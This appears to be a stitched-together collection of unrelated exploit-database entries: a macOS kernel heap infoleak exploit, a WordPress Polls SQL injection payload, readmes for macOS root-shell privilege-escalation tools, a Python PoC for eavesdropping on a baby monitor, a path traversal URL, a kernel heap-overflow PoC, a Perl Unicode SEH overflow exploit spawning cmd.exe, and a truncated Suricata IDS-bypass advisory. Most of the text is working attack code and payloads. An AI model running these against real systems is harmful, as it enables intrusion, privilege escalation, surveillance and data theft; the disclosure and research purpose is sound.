// ---- Macros ------------------------------------------------------------------------------------
#if DEBUG
#define DEBUG_TRACE(fmt, ...) printf(fmt"\n", ##__VA_ARGS__)
#else
#define DEBUG_TRACE(fmt, ...)
#endif
#define ERROR(fmt, ...) printf("Error: "fmt"\n", ##__VA_ARGS__)
// ---- Kernel heap infoleak ----------------------------------------------------------------------
// A callback block that will be called each time kernel data is leaked. leak_data and leak_size
// are the kernel data that was leaked and the size of the leak. This function should return true
// to finish and clean up, false to retry the leak.
typedef bool (^kernel_leak_callback_block)(const void *leak_data, size_t leak_size);
// Open the control socket for com.apple.necp. Requires root privileges.
static bool open_necp_control_socket(int *necp_ctlfd) {
int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
if (ctlfd < 0) {
ERROR("Could not create a system control socket: errno %d", errno);
return false;
}
struct ctl_info ctlinfo = { .ctl_id = 0 };
strncpy(ctlinfo.ctl_name, NECP_CONTROL_NAME, sizeof(ctlinfo.ctl_name));
int err = ioctl(ctlfd, CTLIOCGINFO, &ctlinfo);
if (err) {
close(ctlfd);
ERROR("Could not retrieve the control ID number for %s: errno %d",
NECP_CONTROL_NAME, errno);
return false;
}
struct sockaddr_ctl addr = {
.sc_len = sizeof(addr),
.sc_family = AF_SYSTEM,
.ss_sysaddr = AF_SYS_CONTROL,
.sc_id = ctlinfo.ctl_id, // com.apple.necp
.sc_unit = 0, // Let the kernel pick the control unit.
};
err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));
if (err) {
close(ctlfd);
ERROR("Could not connect to the NECP control system (ID %d) "
"unit %d: errno %d", addr.sc_id, addr.sc_unit, errno);
return false;
}
*necp_ctlfd = ctlfd;
return true;
}
// Allocate a virtual memory region at the address pointed to by map_address. If map_address points
// to a NULL address, then the allocation is created at an arbitrary address which is stored in
// map_address on return.
static bool allocate_map_address(void **map_address, size_t map_size) {
mach_vm_address_t address = (mach_vm_address_t) *map_address;
bool get_address = (address == 0);
int flags = (get_address ? VM_FLAGS_ANYWHERE : VM_FLAGS_FIXED);
kern_return_t kr = mach_vm_allocate(mach_task_self(), &address, map_size, flags);
if (kr != KERN_SUCCESS) {
ERROR("Could not allocate virtual memory: mach_vm_allocate %d: %s",
kr, mach_error_string(kr));
return false;
}
if (get_address) {
*map_address = (void *)address;
}
return true;
}
// Deallocate the mapping created by allocate_map_address.
static void deallocate_map_address(void *map_address, size_t map_size) {
mach_vm_deallocate(mach_task_self(), (mach_vm_address_t) map_address, map_size);
}
// Context for the map_address_racer thread.
struct map_address_racer_context {
pthread_t thread;
volatile bool running;
volatile bool deallocated;
volatile bool do_map;
volatile bool restart;
bool success;
void * address;
size_t size;
};
// The racer thread. This thread will repeatedly: (a) deallocate the address; (b) spin until do_map
// is true; (c) allocate the address; (d) spin until the main thread sets restart to true or
// running to false. If the thread encounters an internal error, it sets success to false and
// exits.
static void *map_address_racer(void *arg) {
struct map_address_racer_context *context = arg;
while (context->running) {
// Deallocate the address.
deallocate_map_address(context->address, context->size);
context->deallocated = true;
// Wait for do_map to become true.
while (!context->do_map) {}
context->do_map = false;
// Do a little bit of work so that the allocation is more likely to take place at
// the right time.
close(-1);
// Re-allocate the address. If this fails, abort.
bool success = allocate_map_address(&context->address, context->size);
if (!success) {
context->success = false;
break;
}
// Wait while we're still running and not told to restart.
while (context->running && !context->restart) {}
context->restart = false;
};
return NULL;
}
// Start the map_address_racer thread.
static bool start_map_address_racer(struct map_address_racer_context *context, size_t leak_size) {
// Allocate the initial block of memory, fixing the address.
context->address = NULL;
context->size = leak_size;
if (!allocate_map_address(&context->address, context->size)) {
goto fail_0;
}
// Start the racer thread.
context->running = true;
context->deallocated = false;
context->do_map = false;
context->restart = false;
context->success = true;
int err = pthread_create(&context->thread, NULL, map_address_racer, context);
if (err) {
ERROR("Could not create map_address_racer thread: errno %d", err);
goto fail_1;
}
return true;
fail_1:
deallocate_map_address(context->address, context->size);
fail_0:
return false;
}
// Stop the map_address_racer thread.
static void stop_map_address_racer(struct map_address_racer_context *context) {
// Exit the thread.
context->running = false;
context->do_map = true;
pthread_join(context->thread, NULL);
// Deallocate the memory.
deallocate_map_address(context->address, context->size);
}
// Try the NECP leak once. Returns true if the leak succeeded.
static bool try_necp_leak(int ctlfd, struct map_address_racer_context *context) {
socklen_t length = context->size;
// Wait for the map to be deallocated.
while (!context->deallocated) {};
context->deallocated = false;
// Signal the racer to do the mapping.
context->do_map = true;
// Try to trigger the leak.
int err = getsockopt(ctlfd, SYSPROTO_CONTROL, 0, context->address, &length);
if (err) {
DEBUG_TRACE("Did not allocate in time");
return false;
}
// Most of the time we end up here: allocating too early. If the first two words are both
// 0, then assume we didn't make the leak. We need the leak size to be at least 16 bytes.
uint64_t *data = context->address;
if (data[0] == 0 && data[1] == 0) {
return false;
}
// WOW! It worked!
return true;
}
// Repeatedly try the NECP leak, until either we succeed or hit the maximum retry limit.
static bool try_necp_leak_repeat(int ctlfd, kernel_leak_callback_block kernel_leak_callback,
struct map_address_racer_context *context) {
const size_t MAX_TRIES = 10000000;
bool has_leaked = false;
for (size_t try = 1;; try++) {
// Try the leak once.
if (try_necp_leak(ctlfd, context)) {
DEBUG_TRACE("Triggered the leak after %zu %s!", try,
(try == 1 ? "try" : "tries"));
try = 0;
has_leaked = true;
// Give the leak to the callback, and finish if it says we're done.
if (kernel_leak_callback(context->address, context->size)) {
return true;
}
}
// If we haven't successfully leaked anything after MAX_TRIES attempts, give up.
if (!has_leaked && try >= MAX_TRIES) {
ERROR("Giving up after %zu unsuccessful leak attempts", try);
return false;
}
// Reset for another try.
context->restart = true;
}
}
// Leak kernel heap data repeatedly until the callback function returns true.
static bool leak_kernel_heap(size_t leak_size, kernel_leak_callback_block kernel_leak_callback) {
const size_t MIN_LEAK_SIZE = 16;
bool success = false;
if (leak_size < MIN_LEAK_SIZE) {
ERROR("Target leak size too small; must be at least %zu bytes", MIN_LEAK_SIZE);
goto fail_0;
}
int ctlfd;
if (!open_necp_control_socket(&ctlfd)) {
goto fail_0;
}
struct map_address_racer_context context;
if (!start_map_address_racer(&context, leak_size)) {
goto fail_1;
}
if (!try_necp_leak_repeat(ctlfd, kernel_leak_callback, &context)) {
goto fail_2;
}
success = true;
fail_2:
stop_map_address_racer(&context);
fail_1:
close(ctlfd);
fail_0:
return success;
}
// ---- Main --------------------------------------------------------------------------------------
// Dump data to stdout.
static void dump(const void *data, size_t size) {
const uint8_t *p = data;
const uint8_t *end = p + size;
unsigned off = 0;
while (p < end) {
printf("%06x: %02x", off & 0xffffff, *p++);
for (unsigned i = 1; i < 16 && p < end; i++) {
bool space = (i % 8) == 0;
printf(" %s%02x", (space ? " " : ""), *p++);
}
printf("\n");
off += 16;
}
}
int main(int argc, const char *argv[]) {
// Parse the arguments.
if (argc != 2) {
ERROR("Usage: %s <leak-size>", argv[0]);
return 1;
}
char *end;
size_t leak_size = strtoul(argv[1], &end, 0);
if (*end != 0) {
ERROR("Invalid leak size '%s'", argv[1]);
return 1;
}
// Try to leak interesting data from the kernel.
const size_t MAX_TRIES = 50000;
__block size_t try = 1;
__block bool leaked = false;
bool success = leak_kernel_heap(leak_size, ^bool (const void *leak, size_t size) {
// Try to find an kernel pointer in the leak.
const uint64_t *p = leak;
for (size_t i = 0; i < size / sizeof(*p); i++) {
if (p[i] >> 48 == 0xffff) {
dump(leak, size);
leaked = true;
return true;
}
}
#if DEBUG
// Show this useless leak anyway.
DEBUG_TRACE("Boring leak:");
dump(leak, size);
#endif
// If we've maxed out, just bail.
if (try >= MAX_TRIES) {
ERROR("Could not leak interesting data after %zu attempts", try);
return true;
}
try++;
return false;
});
return (success && leaked ? 0 : 1);
}
<b>Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability</b>
<br>
Vulnerable version:<=1.2.4
<br>Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip
////////////////////////
<br>/// Overview:
<br>////////////////////////
<br>
<br>WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file.
////////////////
<br>
/// POC ////
<br>
///////////////
<br>
SQL Injection payload to enumerate tables
<br>----------------------------------------------
<br>http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues
<br><b>Post data</b>
<br>question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5
POC<br>
<img src="https://github.com/incredibleindishell/exploit-code-by-me/blob/master/WordPress%20Polls%20plugin-1.2.4-%20SQL%20Injection%20vulnerability/injected.png?raw=true">
<br>
--==[[ Greetz To ]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
<br>Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
<br>Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
<br>Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
<br>
--==[[ Love To ]]==--
<br>My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
<br>Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
## physmem
<!-- Brandon Azad -->
physmem is a physical memory inspection tool and local privilege escalation targeting macOS up
through 10.12.1. It exploits either [CVE-2016-1825] or [CVE-2016-7617] depending on the deployment
target. These two vulnerabilities are nearly identical, and exploitation can be done exactly the
same. They were patched in OS X El Capitan [10.11.5] and macOS Sierra [10.12.2], respectively.
[CVE-2016-1825]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1825
[CVE-2016-7617]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-7617
[10.11.5]: https://support.apple.com/en-us/HT206567
[10.12.2]: https://support.apple.com/en-us/HT207423
Because these are logic bugs, exploitation is incredibly reliable. I have not yet experienced a
panic in the tens of thousands of times I've run a program (correctly) exploiting these
vulnerabilities.
### CVE-2016-1825
CVE-2016-1825 is an issue in IOHIDevice which allows setting arbitrary IOKit registry properties.
In particular, the privileged property IOUserClientClass can be controlled by an unprivileged
process. I have not tested platforms before Yosemite, but the vulnerability appears in the source
code as early as Mac OS X Leopard.
### CVE-2016-7617
CVE-2016-7617 is an almost identical issue in AppleBroadcomBluetoothHostController. This
vulnerability appears to have been introduced in OS X El Capitan. It was reported by Ian Beer of
Google's Project Zero (issue [974]) and Radu Motspan.
[974]: https://bugs.chromium.org/p/project-zero/issues/detail?id=974
### Building
Build physmem by specifying your deployment target on the command line:
$ make MACOSX_DEPLOYMENT_TARGET=10.10.5
### Running
You can read a word of physical memory using the read command:
$ ./physmem read 0x1000
a69a04f2f59625b3
You can write to physical memory using the write command:
$ ./physmem write 0x1000 0x1122334455667788
$ ./physmem read 0x1000
1122334455667788
You can exec a root shell using the root command:
$ ./physmem root
sh-3.2# whoami
root
### License
The physmem code is released into the public domain. As a courtesy I ask that if you reference or
use any of this code you attribute it to me.
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44237.zip
Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite (the free version of WiFi Baby Monitor). Although the premium version offered users the ability to specify a password to be used in the pairing process, the free version offered no such function.
Monitoring the traffic using Wireshark during the pairing process revealed:
- The initial connection is made on port 8257
- To start the pairing process, the same sequence is sent each time
- After the pairing process is finished, another connection is opened to port 8258, where the audio data will be transmitted
- After the connection is made to port 8258, the connection on port 8257 is kept open and used as a heartbeat for the session
- On the heartbeat connection, the client will periodically send 0x01 to the baby monitor (roughly once per second)
## Abusing The Protocol to Record Audio
With the pairing process reversed, it was possible to create a proof of concept which proved that it was possible to deploy a small program into a compromised network which would eavesdrop on a baby monitor and allow for an attacker to play the recording back at a later date at their discretion.
The [very hacky] proof of concept code can be found below:
```
import socket
import sys
import time
if len(sys.argv) < 2:
print "Usage: python {file} target_ip [port]".format(file = sys.argv[0])
exit(1)
target = sys.argv[1]
port = 8257
if len(sys.argv) == 3:
port = int(sys.argv[2])
s = socket.socket()
s.connect((target, port))
s.send('\x01')
s.send('\x02\x64\x00\x00\x00\x13\x2b\x52\x65\x63\x65\x69\x76\x65\x72\x53' +
'\x74\x61\x72\x74\x5f\x32\x2e\x30\x32\x00\x00\x00\x00\x03\x23\x31' +
'\x30\x00\x00\x00\x00\x03\x23\x32\x30\x00\x00\x00\x00\x03\x23\x32' +
'\x31\x00\x00\x00\x00\x03\x23\x32\x32\x00\x00\x00\x00\x03\x23\x32' +
'\x33')
heartbeat_dump = open('dump.heartbeat.bin', 'wb')
data_dump = open('dump.data.bin', 'wb')
has_data_socket = False
data_socket = socket.socket()
delta = 0
while True:
time.sleep(1)
data = s.recv(2048)
if data is not None:
heartbeat_dump.write(data)
print '[*] Received {bytes} bytes on heartbeat socket'.format(bytes = len(data))
s.send('\x01')
if has_data_socket:
data = data_socket.recv(2048)
if data is not None:
data_dump.write(data)
print '[*] Received {bytes} bytes on data socket'.format(bytes = len(data))
data_socket.send('\x01')
else:
print '[*] Establishing data connection'
data_socket.connect((target, 8258))
data_socket.send('\x01')
data_socket.send('\x02\x64\x00\x00\x00\x07\x33\x5f\x5f\x30\x30\x30\x30')
has_data_socket = True
print '[*] Established data connection'
delta += 1
heartbeat_dump.close
data_dump.close
```
This script establishes a connection to the baby monitor and begins to dump out the data from port 8257 to dump.heartbeat.bin and the data from port 8258 to dump.data.bin.
Replaying the Recordings
In order to replay the recordings made by the proof of concept, I created a second script which would act as a baby monitor and replay the data back to a client; which allows for replay via the original application:
```
import socket
import sys
import time
s = socket.socket()
s.bind(('0.0.0.0', 8257))
s.listen(5)
print '[*] Heartbeat socket listening on port 8257'
data_socket = socket.socket()
data_socket.bind(('0.0.0.0', 8258))
data_socket.listen(5)
print '[*] Data socket listening on port 8258'
data = ''
with open('dump.heartbeat.bin', 'r') as replay_file:
data = replay_file.read()
wav_data = ''
with open('dump.data.bin', 'r') as wav_file:
wav_data = wav_file.read()
c, addr = s.accept()
print '[*] Connection from {client}'.format(client = addr)
c.send(data)
data_connection, addr = data_socket.accept()
print '[*] Data connection from {client}'.format(client = addr)
data_connection.send(wav_data)
buf_start = 0
buf_end = wav_data.find('\x00\x00\x00\x01', 1)
buf = wav_data[buf_start:buf_end]
while buf is not None:
c.send('\x01')
print '[*] Sending {bytes} bytes'.format(bytes = len(buf))
data_connection.send(buf)
time.sleep(0.1)
if buf_end == -1 or buf_start == -1:
buf = None
else:
buf_start = buf_end
buf_end = wav_data.find('\x00\x00\x00\x01', buf_end + 1)
if buf_end == -1:
buf = wav_data[buf_start:]
else:
buf = wav_data[buf_start:buf_end]
data_connection.close()
c.close()
print '[*] Connection closed'
```
A demonstration of the replay script accepting a connection from a client and replaying a recording can be seen below:
https://vimeo.com/258487598
## Solution
When notified, the vendor took the [respectably] responsible approach and made available to the free version the security features that were previously exclusive to the premium version.
To prevent this attack, users can simply update to the latest version of the application (v2.02.2, at the time of writing this).
## CVE-ID
CVE-2018-7661
## CVSS Score
CVSS Base Score: 5.9
Impact Subscore: 4.2
Exploitability Subscore: 1.6
CVSS Temporal Score: 5.3
Overall CVSS Score: 5.3
Vector: AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C
## Disclosure Timeline
2018-02-11: Initial contact with vendor to make them aware of the attack vector
2018-02-12: Vendor acknowledged the issue and provided keys to test the premium version to verify the encryption and password protection would resolve the issue
2018-02-15: Confirmation sent to vendor to let them know the proposed solution should nullify the attack
2018-02-16: Vendor begins roll-out process for the new update
2018-02-22: Roll-out process completed and version 2.02.2 made available to the public
# Exploit Title: Parallels Remote Application Server (RAS) 15.5 Path Traversal
# Date: 22-02-2018
# Exploit Author: Nicolas Markitanis - RUNESEC
# Reviewers: Simon Loizides and Marios Nicolaides - RUNESEC
# Vendor Homepage: https://www.parallels.com/
# Affected: Parallels Remote Application Server (RAS) 15.5 Build 16140
# Tested on: Windows
# CVE-ID: CVE-2017-9447
# Category: Web Application
Overview
--------
The web interface of the Parallels Remote Application Server is vulnerable to Path Traversal.
The vulnerability exists due to improper validation of the file path when requesting a resource under the "RASHTML5Gateway" directory.
A remote, unauthenticated attacker could exploit this weakness to read arbitrary files from the vulnerable system using path traversal sequences ("..\\\").
This was tested on Parallels RAS 15.5 (build 16140). Previous versions of may also be affected.
Details
--------
An attacker could exploit this vulnerability by using path traversal sequences ("..\\\") to access sensitive information as demonstrated below (Please note that the file accessed (win.ini) is for demonstration purposes only):
- https://example.com/RASHTML5Gateway//..\\\..\\\..\\\..\\\..\\\windows\win.ini
Impact
--------
An attacker could exploit this vulnerability to gain unauthorized read access to sensitive files located outside of the web root directory. By doing so, an attacker might also be able to compromise valid sessions in order to gain unauthorized access to the RAS interface.
References
----------
https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)
Timeline
--------
5 June 2017 - Parallels informed about the issue
September 2017 - Parallels released a patch
22 February 2018 - Exploit publicly disclosed (https://blog.runesec.com/2018/02/22/parallels-ras-path-traversal/)
## rootsh
rootsh is a local privilege escalation targeting OS X Yosemite 10.10.5 build
14F27. It exploits [CVE-2016-1758] and [CVE-2016-1828], two vulnerabilities in
XNU that were patched in OS X El Capitan [10.11.4] and [10.11.5]. rootsh will
not work on platforms with SMAP enabled.
[CVE-2016-1758]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1758
[CVE-2016-1828]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1828
[10.11.4]: https://support.apple.com/en-us/HT206167
[10.11.5]: https://support.apple.com/en-us/HT206567
### CVE-2016-1758
CVE-2016-1758 is an information leak caused by copying out uninitialized bytes
of kernel stack to user space. By comparing leaked kernel pointers with fixed
reference addresses it is possible to recover the kernel slide.
### CVE-2016-1828
CVE-2016-1828 is a use-after-free during object deserialization. By passing a
crafted binary-serialized dictionary into the kernel, it is possible to trigger
a virtual method invocation on an object with a controlled vtable pointer.
### License
The rootsh code is released into the public domain. As a courtesy I ask that if
you use any of this code in another project you attribute it to me.
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44239.zip
/*
* flow_divert-heap-overflow.c
* Brandon Azad
*
* CVE-2016-1827: Kernel heap overflow in the function flow_divert_handle_app_map_create on OS X
* and iOS. Exploitation requires root privileges. The vulnerability was patched in OS X El Capitan
* 10.11.5 and iOS 9.3.2.
*
* This proof-of-concept triggers a kernel panic on OS X Yosemite. In El Capitan the length fields
* were changed from 64 bits to 32 bits, so the message structure will need to be updated
* accordingly. This exploit has not been tested on iOS.
*
* Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44238.zip
*/
#include <net/if.h>
#include <string.h>
#include <sys/sys_domain.h>
#include <sys/kern_control.h>
#include <sys/ioctl.h>
#include <unistd.h>
int main() {
int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
if (ctlfd == -1) {
return 1;
}
struct ctl_info info = { .ctl_id = 0 };
strncpy(info.ctl_name, "com.apple.flow-divert", sizeof(info.ctl_name));
int err = ioctl(ctlfd, CTLIOCGINFO, &info);
if (err) {
return 2;
}
struct sockaddr_ctl addr = {
.sc_len = sizeof(addr),
.sc_family = AF_SYSTEM,
.ss_sysaddr = AF_SYS_CONTROL,
};
addr.sc_id = info.ctl_id;
addr.sc_unit = 0;
err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));
if (err) {
return 3;
}
struct __attribute__((packed)) {
uint8_t type;
uint8_t pad1[3];
uint32_t conn_id;
uint8_t prefix_count_tag;
uint64_t prefix_count_length;
int prefix_count;
uint8_t signing_id_tag;
uint64_t signing_id_length;
uint8_t signing_id[512 + 4];
} message = {
.type = 9,
.conn_id = htonl(0),
.prefix_count_tag = 28,
.prefix_count_length = htonl(sizeof(int)),
.prefix_count = -2,
.signing_id_tag = 25,
.signing_id_length = htonl(sizeof(message.signing_id)),
.signing_id = { 0xaa },
};
write(ctlfd, &message, sizeof(message));
close(ctlfd);
return 4;
}
#!/usr/bin/perl
# ########################################################################
# Title: Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
# Vulnerability Type: Execute Code, Overflow UTF-16LE buffer, Memory corruption
# Date: Feb 18, 2018
# Author: James Anderson (synthetic)
# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
# Exploit mitigation: There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
# About: The technique is taken from that paper: Creating Arbitrary Shellcode In Unicode Expanded Strings Chris Anley
# Tested on: Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
# ########################################################################
# _ _ _ _
# ___ _ _ _ __ | |_| |__ ___| |_(_) ___
# / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
# \__ \ |_| | | | | |_| | | | __/ |_| | (__
# |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
# |___/
#
# ########################################################################
my $path = "/media/s4/DragonR.m3u";
my $buffer_length = 5000;
my $suboffset = 0x104;
my $NOP1 = "\x6F"; # add [edi], ch
my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx
# [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
my $crash = "A" x 260;
# [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
$crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX
$crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR
my $offset_to_payload = length($crash);
# [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode.
# [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
$crash .= $NOP1; # NOP-eq
$crash .= "\x6a\x59"; # push 0 # pop ecx
$crash .= $NOP1; # NOP-eq
$crash .= "\x41"; # inc ecx
$crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
$crash .= $NOP1; # NOP-eq
$crash .= "\x41"; # inc ecx
$crash .= "\xC8"; # add al, cl
$crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;
# [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x3b\x41"; # mov edx, 41003b00
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
# [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
$crash .= "\x40"; # inc eax
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xec\x41"; # mov edx, 4100ec00
$crash .= "\x30"; # add [eax],dh
# [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x45\x41"; # mov edx, 41004500
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x46\x41"; # mov edx, 41004600
$crash .= "\x30"; # add [eax],dh
# [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x68\x41"; # mov edx, 41006800
$crash .= "\x30"; # add [eax],dh
# [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x78\x41"; # mov edx, 41007800
$crash .= "\x30"; # add [eax],dh
# [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x2F\x41"; # mov edx, 41002F00
$crash .= "\x30"; # add [eax],dh
# [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x63\x41"; # mov edx, 41006300
$crash .= "\x30"; # add [eax],dh
# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x64\x41"; # mov edx, 41006400
$crash .= "\x30"; # add [eax],dh
# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x8d\x41"; # mov edx, 41008d00
$crash .= "\x30"; # add [eax],dh
# [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xf8\x41"; # mov edx, 4100f800
$crash .= "\x30"; # add [eax],dh
# [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xb8\x41"; # mov edx, 4100b800
$crash .= "\x30"; # add [eax],dh
# [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x49\x41"; # mov edx, 41004900
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x4A\x41"; # mov edx, 41004A00
$crash .= "\x30"; # add [eax],dh
# [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x77\x41"; # mov edx, 41007700
$crash .= "\x30"; # add [eax],dh
# [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xd0\x41"; # mov edx, 4100d000
$crash .= "\x30"; # add [eax],dh
# [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe)
# *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
$crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
$crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)
# [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe
my $shellcode =
"\x50". # "\x8b". # # BAD BYTE
# "\xec". # 0
"\x55". # "\x55".
# "\x8b". # 0 # BAD BYTE
"\xec". # "\xec".
# "\x68". # 0
"\x65". # "\x65".
# "\x78". # 0
"\x65". # "\x65".
# "\x2F". # 0
"\x68". # "\x68".
# "\x63". # 0
"\x6d". # "\x6d".
# "\x64". # 0
"\x2e". # "\x2e".
# "\x8d". # 0
"\x45". # "\x45".
# "\xf8". # 0
"\x50". # "\x50".
# "\xb8". # 0
"\xc7". # "\xc7".
# "\x93". # 0 # BAD BYTE
"\xc2". # "\xc2".
# "\x77". # 0
"\xff"; # "\xff".
# "\xd0"; # 0
$crash .= $shellcode;
$crash .= "C" x ($buffer_length - length($crash));
open(myfile, ">$path");
print myfile $crash;
-----------------------------------------------------
Vulnerability Type: Detection Bypass
Affected Product: Suricata
Vulnerable version: <4.0.4
CVE number: CVE-2018-6794
Found: 25.01.2018
By: Kirill Shipulin (@kirill_wow), Positive Technologies
Severity: Medium
------------------------------------------
About Suricata:
---------------
Suricata is a high performance Network Threat Detection, IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF, its supporting vendors and the community
Attack Description:
-------------------
If as a server side you break a normal TCP 3 way handshake packets order and inject some response data before 3whs is complete then data still will be received by the a client but some IDS engines may skip content checks on that.
Attack scenario TCP flow scheme:
Client -> [SYN] [Seq=0 Ack= 0] -> Evil Server
Client <- [SYN, ACK] [Seq=0 Ack= 1] <- Evil Server
Client <- [PSH, ACK] [Seq=1 Ack= 1] <- Evil Server # Injection before the 3whs is completed
